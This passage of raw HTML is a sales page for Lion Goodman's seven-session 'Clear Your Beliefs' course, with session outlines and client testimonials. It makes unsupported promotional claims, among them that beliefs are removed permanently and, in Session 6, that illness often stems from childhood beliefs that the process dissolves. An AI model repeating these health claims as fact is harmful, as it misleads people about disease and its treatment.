yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The 